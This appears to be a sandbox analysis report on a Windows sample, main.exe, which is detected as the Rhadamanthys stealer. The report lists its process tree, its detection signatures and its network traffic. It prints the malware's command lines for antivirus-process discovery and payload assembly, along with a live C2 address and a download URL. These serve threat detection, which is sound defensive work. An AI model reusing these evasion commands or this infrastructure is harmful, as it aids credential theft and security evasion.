Edit tour

Windows Analysis Report
main.exe

Overview

General Information

Sample name:	main.exe
Analysis ID:	1578117
MD5:	014c8105b6501591916dafee9a3344c6
SHA1:	399a4ee96abbd286f321215d5843facab804de7d
SHA256:	2d4c300ef566b5b93590ecc1be25a8bd8c14fbc2de0bf5032af67ca31be1e6ea
Tags:	exesolus-todayuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected RHADAMANTHYS Stealer

AI detected suspicious sample

Drops PE files with a suspicious file extension

Loading BitLocker PowerShell Module

Switches to a custom stack to bypass stack traces

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Uncommon Svchost Parent Process

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

main.exe (PID: 384 cmdline: "C:\Users\user\Desktop\main.exe" MD5: 014C8105B6501591916DAFEE9A3344C6)

conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5808 cmdline: powershell.exe -Command "(Get-CimInstance Win32_Processor).Name" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7308 cmdline: powershell.exe -Command "(Get-CimInstance Win32_VideoController).Name" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7460 cmdline: powershell.exe -Command "try { $avProducts = Get-CimInstance -Namespace 'root/SecurityCenter2' -Class AntiVirusProduct | Select-Object -ExpandProperty displayName; if ($avProducts) { $avProducts } else { 'No antivirus software detected' } } catch { 'Error detecting antivirus software' }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

downloaded_exe.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe" MD5: 22AEFDCE6474D0687748AB51F3DDE0D9)

cmd.exe (PID: 7824 cmdline: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7876 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7888 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7952 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7960 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8000 cmdline: cmd /c md 542181 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 8016 cmdline: findstr /V "exports" Fleece MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8032 cmdline: cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Flux.com (PID: 8048 cmdline: Flux.com b MD5: 62D09F076E6E0240548C2F837536A46A)

svchost.exe (PID: 8164 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

fontdrvhost.exe (PID: 7064 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

WerFault.exe (PID: 1084 cmdline: C:\Windows\system32\WerFault.exe -u -p 7064 -s 140 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 3772 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 968 MD5: C31336C1EFC2CCB44B4326EA793040F2)

choice.exe (PID: 8068 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000017.00000003.2575544799.0000000002C40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000002.2663941815.0000000002C50000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: svchost.exe PID: 8164	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
23.3.svchost.exe.4e10000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
23.3.svchost.exe.4bf0000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Sigma Signatures

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe, ParentProcessId: 7724, ParentProcessName: downloaded_exe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, ProcessId: 7824, ProcessName: cmd.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: Flux.com b, ParentImage: C:\Users\user\AppData\Local\Temp\542181\Flux.com, ParentProcessId: 8048, ParentProcessName: Flux.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8164, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "(Get-CimInstance Win32_Processor).Name", CommandLine: powershell.exe -Command "(Get-CimInstance Win32_Processor).Name", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe", ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 384, ParentProcessName: main.exe, ProcessCommandLine: powershell.exe -Command "(Get-CimInstance Win32_Processor).Name", ProcessId: 5808, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: Flux.com b, ParentImage: C:\Users\user\AppData\Local\Temp\542181\Flux.com, ParentProcessId: 8048, ParentProcessName: Flux.com, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8164, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7824, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7960, ProcessName: findstr.exe

Suricata Signatures

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T09:29:57.294165+0100	2854802	1	Domain Observed Used for C2 Detected	5.35.36.120	7957	192.168.2.5	49811	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5x	Avira URL Cloud: Label: malware
Source: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5	Avira URL Cloud: Label: malware
Source: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatio	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

ReversingLabs: Detection: 25%

Multi AV Scanner detection for submitted file

Source: main.exe

Virustotal: Detection: 6%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7FE8F16C5 CryptStringToBinaryA,CryptStringToBinaryA,

0_2_00007FF7FE8F16C5

Source: unknown

HTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.5:49726 version: TLS 1.2

Source: main.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: svchost.exe, 00000017.00000003.2579206476.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579362809.0000000004D10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: svchost.exe, 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: svchost.exe, 00000017.00000003.2577797743.0000000004DE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2577157449.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: svchost.exe, 00000017.00000003.2578336206.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2578901434.0000000004D90000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: svchost.exe, 00000017.00000003.2577797743.0000000004DE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2577157449.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, 00000017.00000003.2578336206.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2578901434.0000000004D90000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: svchost.exe, 00000017.00000003.2579206476.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579362809.0000000004D10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_00406301 FindFirstFileW,FindClose,		9_2_00406301
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		9_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\542181	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\542181\	Jump to behavior

Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then mov rax, rcx	0_2_00007FF7FE91C000
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then mov eax, dword ptr [rcx+10h]	0_2_00007FF7FE91B040
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	0_2_00007FF7FE905DC0
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push r15	0_2_00007FF7FE925DE0
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rbp	0_2_00007FF7FE986E20
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rsi	0_2_00007FF7FE9B0E80
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then mov rax, qword ptr [rcx+10h]	0_2_00007FF7FE916B79
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push r15	0_2_00007FF7FE93ACA0
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rsi	0_2_00007FF7FE936C30
Source: C:\Users\user\Desktop\main.exe	Code function: 5x nop then xor eax, eax	0_2_00007FF7FE9079C0
Source: C:\Users\user\Desktop\main.exe	Code function: 5x nop then push r15	0_2_00007FF7FE9B49E0
Source: C:\Users\user\Desktop\main.exe	Code function: 5x nop then mov rax, rcx	0_2_00007FF7FE911740
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7FE9A6840
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rsi	0_2_00007FF7FE955570
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then mov r8d, dword ptr [rdx+04h]	0_2_00007FF7FE908700
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push r13	0_2_00007FF7FE93A680
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rsi	0_2_00007FF7FE9383A0
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	0_2_00007FF7FE9B34D0
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rsi	0_2_00007FF7FE923470
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rdi	0_2_00007FF7FE93A210
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rbp	0_2_00007FF7FE93A210
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rdi	0_2_00007FF7FE93A210
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rbp	0_2_00007FF7FE93A210
Source: C:\Users\user\Desktop\main.exe	Code function: 5x nop then lea edx, dword ptr [r9+r9*4]	0_2_00007FF7FE901210
Source: C:\Users\user\Desktop\main.exe	Code function: 5x nop then mov r9d, r8d	0_2_00007FF7FE9721E0
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then push rbx	0_2_00007FF7FE9B2250
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then mov r8d, dword ptr [rax+r9]	0_2_00007FF7FE903240
Source: C:\Users\user\Desktop\main.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	0_2_00007FF7FE909290
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 4x nop then dec esp	27_2_000001E32EC20511

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 5.35.36.120:7957 -> 192.168.2.5:49811

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 5.35.36.120 7957

Source: global traffic

TCP traffic: 192.168.2.5:49811 -> 5.35.36.120:7957

Source: Joe Sandbox View

ASN Name: INF-NET-ASRU INF-NET-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120
Source: unknown	TCP traffic detected without corresponding DNS query: 5.35.36.120

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7FE8F1460 InternetOpenA,InternetOpenA,InternetOpenUrlA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00007FF7FE8F1460

Source: global traffic

HTTP traffic detected: GET /salah/wp-includes/assets/ping.php HTTP/1.1User-Agent: EXEFetcherHost: ebitm.co.ukCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ebitm.co.uk
Source: global traffic	DNS traffic detected: DNS query: dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuD

Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: downloaded_exe.exe, 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmp, Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: downloaded_exe.exe, 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmp, Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: downloaded_exe.exe, 00000009.00000000.2311050640.0000000000409000.00000002.00000001.01000000.00000008.sdmp, downloaded_exe.exe, 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmp, downloaded_exe.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000007.00000002.2222225153.0000026304E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0L
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: downloaded_exe.exe, 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmp, Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: downloaded_exe.exe, 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmp, Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000007.00000002.2222225153.0000026303799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2222225153.0000026303571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Amcache.hve.29.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000007.00000002.2222225153.0000026304981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000007.00000002.2222225153.0000026303799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
